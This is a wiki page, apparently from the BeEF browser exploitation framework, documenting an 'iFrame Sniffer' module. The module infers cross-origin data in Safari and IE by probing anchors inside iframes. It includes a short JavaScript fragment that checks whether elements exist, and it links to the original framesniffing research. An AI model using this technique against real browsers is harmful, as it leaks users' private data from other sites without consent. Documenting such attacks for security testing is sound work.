-
Notifications
You must be signed in to change notification settings - Fork 2.2k
Module: iFrame Sniffer
Jess Williams edited this page Jan 13, 2020
·
3 revisions
-
Objective: Sniff data from other origins via iframes
-
Authors: Bart Leppens
-
Browsers: Safari, IE
By using anchors (#) to request cross-origin resources in an iframe, it can leak information based on the presence and absence of elements.
Content can't be directly read with this technique, but data can be inferred from web applications.
if (typeof LeakyFrame === 'function') {
new LeakyFrame(inputURL,
function(frame){
//check each anchor
for (var anchor = 0; anchor < arrayOfAnchorsToCheck.length; anchor++){
if (frame.checkID(arrayOfAnchorsToCheck[anchor])){
resultList.push('Exists');
}
else{
resultList.push('Does not exist');
}
}
frame.remove();
https://www.contextis.com/en/blog/framesniffing-against-sharepoint-and-linkedin
(old link, maybe check it on archive.org): http://www.contextis.co.uk/research/blog/framesniffing/
- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK